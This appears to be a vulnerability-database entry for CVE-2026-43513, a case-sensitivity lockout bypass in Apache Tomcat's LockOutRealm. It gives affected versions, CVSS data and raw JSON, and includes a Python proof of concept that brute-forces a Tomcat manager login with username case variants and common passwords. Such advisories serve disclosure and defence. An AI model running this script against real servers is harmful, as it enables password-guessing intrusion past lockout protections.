Security Vulnerability Report
CVE-2026-43513 CVSS 7.5 HIGH

Published: 2026-05-12 16:16:18
Last Modified: 2026-05-14 20:17:06

Description

Improper Handling of Case Sensitivity vulnerability in LockOutRealm in Apache Tomcat. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109. Older unsupported versions may also be affected. Users are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Apache Tomcat 11.0.0-M1 through 11.0.21
Apache Tomcat 10.1.0-M1 through 10.1.54
Apache Tomcat 9.0.0.M1 through 9.0.117
Apache Tomcat 8.5.0 through 8.5.100
Apache Tomcat 7.0.0 through 7.0.109

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-43513: Apache Tomcat LockOutRealm Bypass
# This script demonstrates how an attacker can bypass account lockout
# by varying the case of the username.
import itertools
import requests


def generate_case_permutations(username):
    """Generate all possible case variations of a username."""
    return {''.join(p) for p in itertools.product(*[c.lower() + c.upper() for c in username])}


def attempt_login(url, username, password):
    """Simulate a login request."""
    # Note: Actual endpoint and parameters depend on Tomcat configuration
    payload = {'j_username': username, 'j_password': password}
    try:
        response = requests.post(url, data=payload, timeout=5)
        return response.status_code == 200 and "Login Failed" not in response.text
    except requests.RequestException:
        return False


def main():
    target = "http://target-tomcat-manager:8080/manager/html"
    target_user = "admin"
    passwords = ["password", "123456", "admin", "tomcat"]
    print(f"[*] Starting brute force attack bypass for user: {target_user}")
    # Generate case variants (e.g., admin, Admin, ADMIN, aDmin, etc.)
    user_variants = generate_case_permutations(target_user)
    print(f"[*] Generated {len(user_variants)} username variants.")
    for pwd in passwords:
        for variant in user_variants:
            if attempt_login(target, variant, pwd):
                print(f"[+] SUCCESS! Logged in with username: '{variant}' and password: '{pwd}'")
                return
            else:
                print(f"[-] Failed with username: '{variant}' and password: '{pwd}'")
    print("[*] Attack completed.")


if __name__ == "__main__":
    main()

References

https://lists.apache.org/thread/ytjcgldshj73lcnd1sh95od5hrghwogp
http://www.openwall.com/lists/oss-security/2026/05/12/9

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-43513",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-12T16:16:18.177",
    "lastModified": "2026-05-14T20:17:05.727",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Handling of Case Sensitivity vulnerability in LockOutRealm in Apache Tomcat.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.21, from 10.1.0-M1 through 10.1.54, from 9.0.0.M1 through 9.0.117, from 8.5.0 through 8.5.100, from 7.0.0 through 7.0.109.\nOlder unsupported versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.22, 10.1.55 or 9.0.118 which fix the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-178"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/ytjcgldshj73lcnd1sh95od5hrghwogp",
        "source": "[email protected]"
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2026/05/12/9",
        "source": "af854a3a-2127-422b-91ae-364da2661108"
      }
    ]
  }
}